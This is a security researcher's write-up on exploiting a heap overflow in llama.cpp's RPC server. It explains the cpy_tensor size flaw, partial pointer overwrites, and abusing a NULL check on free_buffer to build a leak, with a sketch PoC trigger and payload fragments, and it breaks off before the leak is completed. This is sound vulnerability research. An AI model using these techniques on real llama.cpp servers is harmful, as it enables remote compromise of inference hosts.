Llama's Paradox - Delving deep into Llama.cpp and exploiting Llama.cpp's Heap Maze, from Heap-Overflow to Remote-Code Execution.
February 6, 2025
If you are an exploitation enthusiast, this write-up will be a perfect source of entertainment. I spent ~30h on exploiting the heap-overflow to remote-code execution. Before that, I had already spent around 2 weeks researching/understanding Llama.cpp's source regarding its very own RPC & memory implementations. Since Llama.cpp has such a special heap-management system, special features of this system will defeat the classic ptmalloc exploitations that we are familiar with. Thus, even though this is a heap-overflow, the exploitation won't be a classic ptmalloc heap exploitation, but rather a set of interesting vectors exploiting Llama.cpp's implementation logic. Enjoy reading :)
Llama.cpp is something I have always wanted to work on, a sort of 'ultimate' goal for my AI/ML research; not only that, but finding a stack/heap-overflow RCE in this sophisticated and well-developed ML project always sounded so cool. (Besides, I am so hungry for a binary-exp in AI projects to prove my binary-exploitation skills are not 'outdated', but that's another thing.) Thus, I decided to research Llama.cpp's RPC components when I saw the security advisories posted on its GitHub 'Security' tab - I was like: wow, these are just simple write-what-wheres and read-what-wheres; this must be a 'money' project to work on with only a little bit of effort required.
Then Llama.cpp proved me very wrong. I found nothing in the first two weeks, as they had implemented tons of security checks on RPC Tensor deserialization, full tracing of allocated memory 'buffers', and the implementations of the RPC endpoints. These write-what-wheres were patched so strictly that when you try the old exploits again, you might trigger two assert errors on the way; integer overflow is checked everywhere, and you can't mess with the pointers anymore in any way. It is very secure and not exploitable - devastating as that is, I did gain a better understanding of the implementation itself and of cpp (I never systematically learned cpp). Llama.cpp has its very own memory-management system, memory security patches and mitigations; you will see what I am talking about in most parts of this write-up, as we deal with different paradoxes, mitigations, and entirely new methodologies and exploitation vectors I had never thought of before this unique exploitation. Finally, everything is chained together, and you will see what a unique exploitation script and process look like, as well as the satisfaction of bypassing everything and not giving up along the way.
For this 10k-word write-up, I spent around a month finishing the main parts, and refining/editing took an extra while. Writing this was indeed a painful process: for around two weeks I spent entire days on the weekend and 4-5 hours during the rest of the week working on it. But on the other hand, it was a joyful process of exploring memory things step-by-step. Who doesn't like that? Enjoy reading!
Before the Storm
The story begins at Llama.cpp's RPC functions. For the past few months, Llama.cpp's RPC server had been a focus of exploitation. rpc-server in llama.cpp enables the execution of the GGML backend on a remote host, allowing for distributed large language model (LLM) inference. By offloading computations to one or more rpc-server instances, users can leverage the processing power of multiple machines or specialized hardware, such as GPUs, to enhance performance.
At the very beginning of the development stage of the RPC server, low-level memory security vulnerabilities were reported (GHSA-wcr5-566p-9cwj, GHSA-5vm9-p64x-gqw9j, GHSA-mqp6-7pv6-fqj), mostly exploiting Llama.cpp's tensor memory-related operations. These early-stage vulnerabilities are straightforward exploits that depend less on GGML's RPC memory management logic and more on input considerations. Still, we should understand a bit about its memory management process.
Llama.cpp implements its own mechanism for memory management, based on glibc's basic malloc and the classic ptmalloc management methods, with added features in the management process to optimize Tensor-related operations.
To begin with, all memory-related operations require RPC-allocated memory via the alloc_buffer command. The RPC endpoint for it requires only a size parameter. However, this is a bit more complex than simply returning the malloc-ed pointer address. Instead, the address of an additionally allocated buffer structure, with the actual malloc-ed region wrapped as buffer->data, will be returned. In the meantime, Llama.cpp's RPC parses requests in the format of Tensor, which serves not only as a form of payload for these memory-related commands, but also as the serialization standard for the RPC communication.
Prerequisites: Tensor, buffer structure
// ggml/src/ggml-backend-impl.h:60
struct ggml_backend_buffer {
struct ggml_backend_buffer_i iface;
ggml_backend_buffer_type_t buft;
void * context;
size_t size;
enum ggml_backend_buffer_usage usage;
};
The buffer structure consists of the buffer methods/pointers structure ggml_backend_buffer_i iface; the backend buffer type ggml_backend_buffer_type_t buft; the actual address of the allocated memory, context; the size_t size of the allocated memory; and lastly the ggml_backend_buffer_usage usage. The interesting part here is the iface structure, a part that we will embrace a lot and analyze much more deeply during the exploitation steps.
struct ggml_backend_buffer_i {
void (*free_buffer) (ggml_backend_buffer_t buffer);
void * (*get_base) (ggml_backend_buffer_t buffer);
void (*init_tensor) (ggml_backend_buffer_t buffer, struct ggml_tensor * tensor);
void (*memset_tensor)(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, uint8_t value, size_t offset, size_t size);
void (*set_tensor) (ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size);
void (*get_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * tensor, void * data, size_t offset, size_t size);
bool (*cpy_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * src, struct ggml_tensor * dst);
void (*clear) (ggml_backend_buffer_t buffer, uint8_t value);
void (*reset) (ggml_backend_buffer_t buffer);
};
Llama.cpp's multi-architecture support makes it necessary to assign different methods according to the targeted server architecture; for instance, on machines with only CPU support, iface.get_tensor will be set to ggml_backend_cpu_buffer_get_tensor, while a CUDA-supported server will enable ggml_backend_cuda_buffer_get_tensor. These methods, differing per architecture, have identical logic but different compatibility variations (for instance, a CUDA machine uses cudaMemcpyAsync, while the CPU versions use the native memcpy from the C standard library).
struct ggml_tensor {
enum ggml_type type;
GGML_DEPRECATED(enum ggml_backend_type backend, "use the buffer type to find the storage location of the tensor");
struct ggml_backend_buffer * buffer;
int64_t ne[GGML_MAX_DIMS]; // number of elements
size_t nb[GGML_MAX_DIMS]; // stride in bytes:
// compute data
enum ggml_op op;
// op params - allocated as int32_t for alignment
int32_t op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
int32_t flags;
struct ggml_tensor * src[GGML_MAX_SRC];
// source tensor and offset for views
struct ggml_tensor * view_src;
size_t view_offs;
void * data;
char name[GGML_MAX_NAME];
void * extra; // extra things e.g., for ggml-cuda.cu
char padding[8];
};
Tensor is used everywhere in llama.cpp. We won't yet delve into the technical details of int64_t ne[GGML_MAX_DIMS]; / size_t nb[GGML_MAX_DIMS]; and how they store a tensor's shape and strides. In addition to transporting tensor data, the Tensor structure in llama.cpp provides a serialization standard for the RPC communications. Combined with the previous introduction to the buffer structure, let's take a look at an instance of how the memory-allocation endpoints communicate using buffer and Tensor.
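To make this concrete, here is a rough client-side sketch in Python; the framing (1-byte command, 8-byte length) and the command id are assumptions for illustration only and may differ across llama.cpp versions:

import socket
import struct

RPC_CMD_ALLOC_BUFFER = 0   # assumed command id, purely for illustration

def rpc_call(sock: socket.socket, cmd: int, payload: bytes) -> bytes:
    # assumed framing: | 1-byte command | 8-byte LE payload length | payload |
    sock.sendall(struct.pack("<BQ", cmd, len(payload)) + payload)
    out_len, = struct.unpack("<Q", sock.recv(8))
    return sock.recv(out_len)

def alloc_buffer(sock: socket.socket, size: int) -> int:
    # alloc_buffer takes only a size; the server mallocs the backing region
    # and replies with the address of the wrapping buffer structure
    rsp = rpc_call(sock, RPC_CMD_ALLOC_BUFFER, struct.pack("<Q", size))
    remote_ptr, = struct.unpack("<Q", rsp[:8])
    return remote_ptr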
Past Patches, Mitigation
The three reported advisories we mentioned previously (GHSA-wcr5-566p-9cwj, GHSA-5vm9-p64x-gqw9j, GHSA-mqp6-7pv6-fqj) exploit a fundamental design flaw - the lack of boundary checks on the buffer / buffer->data pointer. The existence of this flaw across different features of the RPC server - whether get_tensor or set_tensor - allowed attackers to achieve read-what-wheres or write-what-wheres.
static void ggml_backend_cpu_buffer_set_tensor(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {
    memcpy((char *)tensor->data + offset, data, size);
    // write-what-where: past versions of Llama.cpp's RPC had no sanitization on buffer->data validity; sadly you could just write-what-where
    GGML_UNUSED(buffer);
}
However, these memory problems were solved by implementing tons of glibc-level memory checks on the buffer structure - at times a pointer or Tensor size will be checked twice, or even more. These mitigations are implemented before the deserialization of a tensor (deserialize_tensor()), in the RPC method call-wrappers (e.g. rpc_server::set_tensor), in the call-wrappers' internal implementations (e.g. ggml_backend_tensor_set), and even in the buffer->iface implementations (e.g. ggml_backend_cpu_buffer_cpy_tensor). These four stages of checks validate the pointers at every step of the RPC processing. (Fun fact: at the very beginning of the research I spent around 3-5 hours just to figure out how the tensor checks work so I could retry the past exploitations, to see if they fixed them properly - and they did.)
Looking into these mitigations step by step: the first check a remote Tensor will face is at deserialize_tensor(), where the tensor->data pointer, used mainly in get_tensor and set_tensor, is checked against the range from ggml_backend_buffer_get_base to ggml_backend_buffer_get_size; it also considers exploitations where tensor_size is possibly negative, which could result in backward writes/reads in the set/get_tensor methods. In the meantime, ggml_backend_buffer_get_base and ggml_backend_buffer_get_size - wrappers for buffer->context and buffer->size - make bypassing this mitigation non-trivial: we would need to forge a buffer structure with valid internal buffer pointers.
// ggml/src/ggml-rpc/ggml-rpc.cpp:848
if (result->buffer) {
// require that the tensor data does not go beyond the buffer end
uint64_t tensor_size = (uint64_t) ggml_nbytes(result);
uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);
uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);
GGML_ASSERT(tensor->data + tensor_size >= tensor->data); // check for overflow
GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);
}
Worth mentioning: the buffer pointer's validity is also checked in ggml/src/ggml-rpc/ggml-rpc.cpp:843 (deserialize_tensor()) -> result->buffer && buffers.find(result->buffer) == buffers.end(), by examining the global buffer management array buffers; this prevents any pre-forged buffer structure exploitation.
request.tensor.data / (buffer->data) validity, along with request.offset / request.size, is checked further in the call-wrapper implementations. Here the sanitization is similar to the previous one, using ggml_backend_buffer_get_base and ggml_backend_buffer_get_size (we may refer to these as p0 and p1 later); however, it also includes the offset / size that are part of the RPC-passed parameters, since these can change the range of the final get_tensor / set_tensor, and so they are checked together with buffer->data. Interestingly, it is also checked whether request.tensor.data + request.offset is negative, to prevent backward writes/reads, while out-of-bounds reads/writes via request.size are prevented as well.
// ggml/src/ggml-rpc/ggml-rpc.cpp:924
{
const size_t p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer);
const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
if (request.tensor.data + request.offset < p0 ||
request.tensor.data + request.offset >= p1 ||
request.size > (p1 - request.tensor.data - request.offset)) {
GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
}
}
Lastly, some buffer->iface implementations also implement checks. For instance, ggml_backend_cpu_buffer_cpy_tensor checks (ggml_backend_buffer_is_host(src->buffer)) to make sure src->buffer is valid. This is a well-considered sanitization, since one possible exploitation I considered was manually leaving src->buffer as NULL, which would skip the p0/p1 checks on src->data (since buffer is a NULL pointer, the internal processing of ggml_backend_buffer_get_base will skip its tests and return 0), potentially allowing us to leak arbitrary addresses. That would have been very exploitable, and it is clearly part of their considerations.
Analysis: Dimensions to Destruction, cpy_tensor, and ggml_nbytes
Despite the buffer->data pointer being sanitized in every possible way, and get_base() (buffer->context) and buffer->size being examined in such scary ways, we still found an interesting heap-overflow vector hidden in the jungle of the ggml_backend_cpu methods during the research process.
The exploitation starts with an interesting method: ggml_nbytes, which calculates the dimensional size of Tensor objects.
size_t ggml_nbytes(const struct ggml_tensor * tensor) {
size_t nbytes;
const size_t blck_size = ggml_blck_size(tensor->type);
if (blck_size == 1) {
nbytes = ggml_type_size(tensor->type);
for (int i = 0; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
else {
nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
for (int i = 1; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
return nbytes;
}
int64_t ggml_blck_size(enum ggml_type type) {
return type_traits[type].blck_size;
}
static const struct ggml_type_traits type_traits[GGML_TYPE_COUNT] = {
[GGML_TYPE_I8] = {
.type_name = "i8",
.blck_size = 1,
.type_size = sizeof(int8_t),
.is_quantized = false,
},
// ....
ggml_nbytes() is a method frequently loaded by llama.cpp from libggml-base.so (ggml.c) to calculate the data size of a Tensor (a tensor is a multi-dimensional data structure commonly used in machine learning and numerical computing), based on the Tensor's shape tensor->ne[] and stride tensor->nb[].
A tensor type's corresponding blck_size is fetched via the method ggml_blck_size, a wrapper for the global variable type_traits. (Interestingly, past vulnerabilities were identified around ggml_blck_size when the type of the ggml_tensor wasn't limited/sanitized; this allowed out-of-bounds reads off the type_traits global variable, until they introduced a limit on Tensor->type.) These .blck_size values do not increase linearly; instead, they depend on the properties of each GGML_TYPE_X itself.
The interesting part here is that nbytes, the size of the Tensor, is calculated and determined by the tensor->ne[i] array, tensor->nb[0], and the tensor->type (converted into blck_size using ggml_blck_size), meaning that if the Tensor's ne[] or nb[] is controlled, the returned nbytes is controlled (to keep the exploitation part focused, we will not explain how the size is calculated just yet). This isn't really a problem in llama.cpp's general usage of ggml_nbytes, since GGML Tensors typically have practical limits on their dimensions due to memory constraints. However, it does become the start of the storm in one of GGML's backend dynamic iface binding methods, ggml_backend_cpu_buffer_cpy_tensor.
static bool ggml_backend_cpu_buffer_cpy_tensor(ggml_backend_buffer_t buffer, const struct ggml_tensor * src, struct ggml_tensor * dst) {
if (ggml_backend_buffer_is_host(src->buffer)) {
memcpy(dst->data, src->data, ggml_nbytes(src));
return true;
}
return false;
GGML_UNUSED(buffer);
}
This seems like a properly functioning and secure buffer->iface implementation (it might have seemed even more innocent had I not introduced ggml_nbytes in the context of an exploitation blog). Regarding all the three-level checks llama.cpp implemented, these checks stop us from any sort of way to mess with the buffer->data pointer or the passed offset / size. Add the small check on ggml_backend_buffer_is_host, and there is nothing really to exploit in its cpy functionality.
However, notice that the size of the memcpy is calculated from the Tensor dimensional size of src, using ggml_nbytes, and you will start to see the problem. You see, ggml-rpc.cpp:854 does check ggml_nbytes via uint64_t tensor_size = (uint64_t) ggml_nbytes(result) against tensor->data and buffer_start - but this only checks whether an out-of-bounds happens within the tensor's own buffer->context. In the case of copying one src->data to another context, dst->data, the ggml_nbytes calculation is driven by the input-controllable Tensor members ne[] / nb[], which are copied verbatim during deserialize_tensor(), and this iface implementation never compares the ggml_nbytes sizes of the src and dst Tensors. This allows us to declare a large dimensional size for src while the dst is actually 'smaller' (by large and small we mean the actual applied size), so the copy runs past the end of dst, leading to a heap overflow.
In the meantime, the controllability of src->context also guarantees the exploitability of this vulnerability: we can beforehand use set_tensor to fill src->context with our payload, and overflow from there onto dst->context.
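Putting the pieces together, here is a heavily hedged sketch of the trigger flow; make_tensor, set_tensor, and copy_tensor are hypothetical helpers in the spirit of the alloc_buffer sketch earlier, not llama.cpp APIs, and the exact wire layout is version-dependent:

# Hedged PoC flow for the cpy_tensor overflow.
SMALL, BIG = 0x100, 0x1000

src_buf = alloc_buffer(sock, BIG)    # big enough that ggml_nbytes(src)
                                     # passes deserialize_tensor's bounds check
dst_buf = alloc_buffer(sock, SMALL)  # the victim allocation

# Stage the payload inside src's context with a regular, in-bounds write:
set_tensor(sock, src_buf, data=b"A" * BIG)

# src honestly fits its own buffer, but its ne[]/nb[] make ggml_nbytes(src)
# far larger than dst's real allocation (type i8 -> blck_size == 1):
src = make_tensor(buffer=src_buf, ne=[BIG, 1, 1, 1], nb=[1, 1, 1, 1])
dst = make_tensor(buffer=dst_buf, ne=[SMALL, 1, 1, 1], nb=[1, 1, 1, 1])

# ggml_backend_cpu_buffer_cpy_tensor runs
#     memcpy(dst->data, src->data, ggml_nbytes(src));
# without ever comparing ggml_nbytes(src) against dst's size:
copy_tensor(sock, src, dst)          # writes BIG bytes into a SMALL chunk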
The Storm: Exploiting the World of Paradox.
Finding a heap-overflow is a great thing, but getting to exploit a heap-overflow is even better. Usually the crash files from a heap-overflow / asan run are sufficient to submit it as a heap-overflow, but what's the fun in that? On the other hand, exploiting this heap-overflow in a unique and sophisticated memory-management system dragged us into this storm, and into the World of Paradox.
The whole exploitation part was written along with the research process, meaning part of it was written before the vulnerability was proven exploitable (which also makes it very enjoyable to read). I recommend reading till the end; things get more and more interesting.
Setting a breakpoint at the room where it happened, here is where my first thought went: taking a look at dst->data, we find that this chunk lies very close to a buffer structure:
In this case, the closest buffer structure is at 0x55555557dd10-0x55555557dc00, only 0x110 from the overflown dst->data. Such a "coincidence" in the arrangement of chunks made us very happy! Why, you might ask? For that we need to look back at ggml/src/ggml-rpc/ggml-rpc.cpp; this is what happens when a request is parsed by the RPC server, using the set_tensor operation as an example:
1. Enter static void rpc_serve_client(ggml_backend_t backend, sockfd_t sockfd, size_t free_mem, size_t total_mem), where the RPC server listens for socket connections.
2. Enter the specific switch case that the p8() command indicates; in this case it will enter case RPC_CMD_SET_TENSOR:.
3. Then into server.set_tensor(input), the rpc_server-type method for handling requests; here the server deserializes tensors and checks for boundaries and sanitization...
4. Eventually, enter a ggml_backend_* method (in this case ggml_backend_tensor_set); this method is located in the ggml-backend.cpp file, where the actual operations regarding tensors happen.
5. Inside the ggml_backend_* file, because of the different types/architectures of RPC servers, Llama.cpp does not use single static methods to operate on these tensors; instead, these operation "threads" are assigned at runtime and stored on the buffer structure (as buf->iface), e.g. the tensor_set operation eventually calls buf->iface.set_tensor(buf, tensor, data, offset, size);.
What this means is that if we can control the buffer address (not the context address) via the overflow, since they sit at such adjacent addresses, we can control the members of the buffer structure. For example, by manipulating buffer->iface, the backend operation methods, we can redirect the execution flow to an arbitrary address; by manipulating the context variables, we can bypass the existing range checks to re-establish the write-what-where / read-what-where!
For now, our job is manipulating the heap: calculating heap offsets between chunks and structure members using cyclic and flat(). This is a long process, since other heap components will usually be affected during the overflow. The size of the overflow needs to be calculated carefully or you will overwrite things unintentionally; this requires you to play with the dimension sizes of both the written tensor and the overflown tensor.
After spending a morning working on the side effects of the overflow, we can call an arbitrary address now! (For some reason we corrupt other chunks' headers during the overflow, causing errors in free() / munmap_chunk(): invalid pointer; this was fixed by observing the heap structure before/after the overflow - you will need to set a chunk's header manually. Since we can arrange allocated chunks freely, we can predict the size header of the next chunk if we use the same allocation approach, while considering the prev_in_use flag; in this case we write sizeof(buffer)+0x8, 0x110, as the size header.)
Paradox-of-Overflow
As mentioned before, both deserialize_tensor and the implementations of the backend methods present strict boundary checks on the context size and the tensor->data range after the previous patches. Specifically, the mitigation in deserialize_tensor checks whether tensor->data is in range via ggml_backend_buffer_get_base and ggml_backend_buffer_get_size (both methods depend on the buffer members buffer->context and buffer->size), while the implementations check whether the boundary can be corrupted under the influence of the request parameters. The problem arises here, taking this overflow to a new, hellish level: even though we can control the execution flow of the RPC server to an arbitrary address, we hold zero addresses worth redirecting it to. Usually this would be an easy-to-solve problem: since we already have control over the buffer structure, we could manipulate the buffer members used in the sanitization of tensor->data / the buffer base, to bypass the patches on the previous vulnerabilities. However, here the Paradox-of-Overflow comes into place:
1. To bypass the tensor->data / buffer_base boundary mitigation, we have to modify the buffer's context / get_base members.
2. Modifying buffer will corrupt other buffer members and pointers, as long as we haven't obtained/leaked the ggmlbase base address to calculate the actual addresses of these buffer->iface ptrs.
3. To leak ggmlbase pointers, or the ggmlbase base address, we must read outside of the legal tensor->data range, meaning we must bypass the boundary mitigation - which brings us back to the first step.
Re-stating the fact that we hold zero pointers at the point of the first overflow, the paradox-of-overflow makes it impossible to exploit solely via buffer - though this could be a really, really useful vector once we can edit buffer members such as context and get_base without risking corrupting the entire buffer (with that, we could bypass anything to leak libc etc. further on). But for now, it's best that we leave this vector here and use it when we need it!
Partial-write: partial-write in real life?
In classic glibc CTF exploitation, there is a technique, or a little trick, that people know about but that is getting less practical nowadays, called partial writing. By "partial writing" we mean writing only parts (sounds like a cliche, but it needs reinforcing) of a pointer.
For readers not familiar with partial writing: in most systems, pointers are stored as multi-byte values (e.g., 8 bytes on a 64-bit system). These bytes can be broken down into smaller sections, such as the lower bytes (LSB), the middle bytes, or the higher-order bytes (MSB), and how they are stored is often counter-intuitive on little-endian architectures, where the MSB sits at the larger memory address while the LSB sits at the lower one. What this means is that a pointer of 0xdeadbeef, for example, looks like ef be ad de in memory.
A binary often requires libraries to run, for example the standard C library libc or other self-compiled libraries. Although you can statically compile a binary (embedding the external methods/types inside the binary), this results in a considerably large ELF. Instead, during runtime, the ELF dynamically links the library, and the library is mapped into the memory segmentation of the program (you can check the memory mapping using vmmap in gdb) and referenced using (offset / 'real address' in library + mapping_base). However, thanks to ASLR, these base addresses are loaded/mapped randomly. In case the ELF does not itself contain a method for, e.g., executing commands, and we are seeking RCE, the only way for us to call system is to first leak the dynamically linked library's (usually libc.so.6's) mapped base address in the ELF, then use the fixed offset inside the library to calculate the actual address of the method.
Now, here's where partial writing becomes particularly interesting. The combination of the memory-alignment mechanism in the address mapping of dynamically linked libraries and the little-endian architecture enables an interesting vector that lets us reach certain methods in a dynamically linked library without knowing any mapped base address: partially overflowing the pointer - without corrupting the mapped base. Since all base addresses align to 0x1000, the low twelve bits of a dynamically linked pointer are not affected by the loaded ASLR-ed base, but are straightforwardly determined by the dynamically linked offset. Thus, with the power that little-endian gives us to modify a pointer starting at its LSB, we can redirect the pointer to an arbitrary offset off the same base! Even though we cannot write one-and-a-half bytes to a pointer, it takes at most 16 guesses (nibble values 0x0-0xf) to land the remaining nibble of the mapped base.
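A tiny self-contained demonstration of the two facts this relies on (little-endian byte order and 0x1000-aligned bases); the base and offset are made-up example values:

import struct

base   = 0x7ffff7e68000    # made-up, page-aligned (0x1000) ASLR'd library base
offset = 0x1319c           # fixed offset of some function inside the library
ptr    = base + offset

# Little-endian: the least significant bytes come first in memory
print(struct.pack("<Q", ptr).hex(" "))   # 9c b1 e7 f7 ff 7f 00 00

# 0x1000 alignment means the low 12 bits of the pointer equal the low 12
# bits of the offset, independent of where ASLR put the base:
assert ptr & 0xfff == offset & 0xfff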
Paradox of Partial-write? Again?
In the case of our exploitation, all buffer->iface pointers belong to the libggml-base dynamically linked library, sharing the same base (you can observe that all pointers start with 0x7ffff7e7....); theoretically, we can redirect them to arbitrary methods compiled into libggml-base.so. However, taking another closer look, you will find that this is actually an extremely difficult exploitation path, since:
1. Controlling the ggml_nbytes is extremely hard and time-consuming, because you can't just "calculate" the size; instead, you need to change the dimension specification of the tensor, leaving around 40 different combinations.
2. In the best case, I managed to partially overflow the last two bytes of the first member - free_buffer - and it's extremely hard to locate gadgets/functions within the 0xffff range (0x17000 < addr < 0x26fff translated into offsets within the ggmlbase library).
3. free_buffer is called under harsh conditions, where only the buffer is passed into the function, eliminating any chance of using ggml_backend_cpu_buffer_get/set_tensor to manage an arbitrary write / arbitrary read.
The image above showcases how many methods/gadgets exist in the ggmlbase library; most of the GOTs you see are outside of the controllable range 0x17000 < addr < 0x26fff. We can't partially overwrite toward those addresses, since controlling more than the two low bytes requires too many resources. (Since the vmmap base address aligns with 0xfffffffffffff000, the last three nibbles are fixed despite the base changing; we can still cope with the 1-nibble difference even multi-threaded, since we only need to guess 16 values at most.)
In the first few hours of researching partial writes, this really seemed like a dead end. On one hand, only iface->free_buffer is partial-writable, since manipulating other members would corrupt the preceding members, as we keep mentioning (for instance, trying to partially write the iface->get_tensor pointer would corrupt the iface->set_tensor pointer, since set_tensor comes before get_tensor in the structure definition). On the other hand, free_buffer is called right after the cpy_tensor operation is triggered (meaning iface->free_buffer is called immediately after the overflow), and while we have a sort of control over the rdi register, the first parameter of iface->free_buffer, we still have no way of leaking any pointers: even if we managed to leak a pointer by manipulating free_buffer, we couldn't receive the leak, since rpc_free_buffer does not send the return value back over the RPC connection.
This is a tricky scenario. To sum up, all these limitations make iface->free_buffer not leak-exploitable, while it seems impossible to exploit any other buffer->iface member. In the meantime, without leaking any pointers, the Paradox-of-Overflow keeps us from any further exploitation by forging buffer->context.
But sometimes, changing the perspective, or simply taking another deeper look at something really small and tiny, may solve the problem.
Solving the Paradox: What else can we do when classic ptmalloc doesn't work?
If you re-examine the obstacles, you will find that actually every problem is related to iface->free_buffer, whether its structural properties or its influence over execution:

1. iface->free_buffer is the first element/member in the buffer->iface structure.
   - We can't exploit partial-write on any other member of buffer->iface, since doing so would corrupt iface->free_buffer.
2. iface->free_buffer is called implicitly right after the overflow.
   - From 1., corrupting iface->free_buffer will crash the program.
   - Since it's called implicitly, we can't leak anything: it does not return anything into the data flow (RPC connection).
This is really the key of the exploitation here. As introduced before, if iface->free_buffer were not called right after the partial write, we could have partially written the iface->get_base pointer for something cool (since get_base can be called remotely with a manipulatable argument, and its return data is retrievable).
In the meantime, I spent time researching possible ptmalloc exploitation vectors (e.g. large bin attacks, tcache bin attacks); all we need is to leak a libc / ggml-base base address - we don't even need to achieve a write-what-where in order to exploit further.
Unfortunately, llama.cpp's heap management seemed unexploitable: special features/mechanisms of the system made the classic ptmalloc exploitations inapplicable. Indeed, we can construct overlapping chunks and manage to achieve UAFs, but the buffers global array and the limitations during/after deserialize_tensor stop us from operating on non-rpc-applied chunks. In the meantime, the peculiar chunk-assignment mechanism stops us from going anywhere beyond the tcache bin list - you can't really fill up a single tcache bin size class to try to reach the large bins (and then try to leak their pointers).
One other odd idea that popped into my head was trying an out-of-bounds read via the cpy_tensor sink that we exploited previously (I am sure this is what people tend to think of after struggling for a while on how to leak). However, remember that the reason we achieve the overflow is the wrongful calculation on the src Tensor (ggml_nbytes(src)), and ggml_nbytes() is constrained by the previously introduced mitigations/patches that enforce boundary checks, via get_base(), on the current Tensor. Summing up: we are indeed allowed to overflow the dst Tensor, but we can't really read extra from the current Tensor.
This is really a pain in the butt. If classic ptmalloc, our last resort, leaves no room to exploit, it seems impossible to escalate this heap-overflow to anything other than a DoS - consider the time already spent on this exploit.
After another extremely tiring few rounds of looking back into llama.cpp's source code (taking lots of time and thought), breaking down and rethinking the entire process over and over again, I was unexpectedly and luckily able to find a part that we had ignored, where the final solution initiates: by solving just one minor part of the paradox, the entire paradox unwrapped itself, leading to RCE.
NullPointerNoException
void ggml_backend_buffer_free(ggml_backend_buffer_t buffer) {
if (buffer == NULL) {
return;
}
if (buffer->iface.free_buffer != NULL) {
buffer->iface.free_buffer(buffer);
}
delete buffer;
}
This code segment is snipped from the ggml_backend_buffer_free method, which can be reached via the rpc endpoint through rpc_server::free_buffer -> ggml_backend_buffer_free; it is additionally called during rpc_server::~rpc_server, for (auto buffer : buffers) -> ggml_backend_buffer_free, invoked after every RPC connection as the auto-freeing behaviour for every leftover buffer (also the reason why iface.free_buffer is triggered right after the overflow, resulting in our Paradox-of-Overflow).
The interesting part in this very small code segment: before buffer->iface.free_buffer(buffer); is called, buffer->iface.free_buffer is actually checked for null (whether the pointer is null), for some reason. This check doesn't seem to make sense, since the buffer structure is allocated by the rpc server itself. One possible explanation is the ggml_backend_cpu_buffer_from_ptr_i definition at ggml/src/ggml-backend.cpp:1911, where .free_buffer is set to NULL; according to the comment (// ptr is not owned by the buffer, so it does not need to be freed), when the buffer is initialized from another buffer structure (when called/initialized via ggml_backend_cpu_buffer_from_ptr), it does not require freeing. This feature didn't raise much attention at the beginning; on the face of it, all it buys us is avoiding a crash right after the overflow. But applied together with the partial-writing technique and some extra boundary-calculation tricks, it is fun and explorable.
You might ask why this is interesting, fun, and explorable. That requires us to look back at the paradox of partial writing; summarized, it says:

1. Changing free_buffer will crash the program, since we don't know any address.
2. Even if we partially overwrite free_buffer, which indeed avoids the crash, it is meaningless beyond avoiding the crash: we can't receive any return from the redirected execution flow to break the paradox-of-overflow.
3. We can't overwrite anything beyond free_buffer.
What the paradox of partial writing represents is that partial writing is useless. However, with the help of the buffer->iface.free_buffer != NULL check this time, what it indirectly means to us is:

1. iface.free_buffer can be set to a known address (NULL) to avoid crashing;
2. We can modify members that come after iface.free_buffer, since the overwrite of iface.free_buffer will no longer crash the execution flow (see the sketch below).
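As a rough illustration in pwntools (offsets and the written value are placeholders; the real ones are derived in the next sections), the tail of the overflow payload would look something like this:

from pwn import p64, p16

# Illustrative overflow tail once the write reaches dst->buffer's iface:
tail  = p64(0)        # iface.free_buffer = NULL: ggml_backend_buffer_free
                      # now skips the call instead of crashing
tail += p16(0xdead)   # partial write of iface.get_base's low 16 bits,
                      # retargeting it inside libggml-base.so
# the overflow stops here; everything past these two bytes stays intact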
What this furthermore means is that this simple extra check provides the solution that breaks the paradox-of-overwriting! Despite the fact that we still hold no libc / ggml-base base addresses, we are able to partially write another buffer->iface member that has an entirely controllable first-parameter register and a receivable return - the essential factors that make leaking possible, theoretically.
Nevertheless, this doesn't mean we get an easy exploitation route right after this. We still face the problems of finding a proper partial-write target located within the 0xffff range of the partially overwritten method inside the linked ggml-base library - a method that leaks an entire dynamically loaded pointer while we only control the first-parameter register (because the only way to receive a return is via the RPC server endpoints that reach buffer->iface methods, and these endpoints deserialize buffer as the only argument) - and lastly, an extremely precise ne[] / nb[] size calculation so that ggml_nbytes() returns exactly the right offset/position for the partial write. Not an easy exploitation at all.
A little heads-up here: even having solved the paradox-of-partial-writing, we still can't solve the paradox-of-overflow by overwriting the buffer->context pointer, since that would corrupt the get_tensor / set_tensor method pointers that come before it, making them invalid/null during the exploitation of buffer->context, which references the methods from the same buffer structure.
However, nothing is impossible; let's see how we can solve the further exploitation piece by piece, layer by layer, and then beautifully construct a leak.
Constructing Leak: Piece by Piece, Layer by Layer
The objective right now is to construct a leak. Thanks to the previous research, the partial-writing technique seems to be the right way to go; additionally, with the NullPointerNoException exploitation, we are able to target buffer->iface->get_base as our partial-overwrite target.
The reason iface->get_base gives us more room to exploit is that it can be called via case RPC_CMD_BUFFER_GET_BASE -> server.buffer_get_base -> ggml_backend_buffer_get_base -> buffer->iface.get_base(buffer);, while the return value of ggml_backend_buffer_get_base is returned directly as response.base_ptr = reinterpret_cast<uint64_t>(base); via the RPC endpoint - directly leakable.
However, to find the right manipulation address for buffer->iface->get_base, as we stated previously, we still have to find the right gadget within the 0xffff range, one that allows us to leak when only the rdi register is manipulatable, and lastly to precisely control the ggml_nbytes() calculation (I really like to repeat things).
Leak No.1: Right range, Right leak
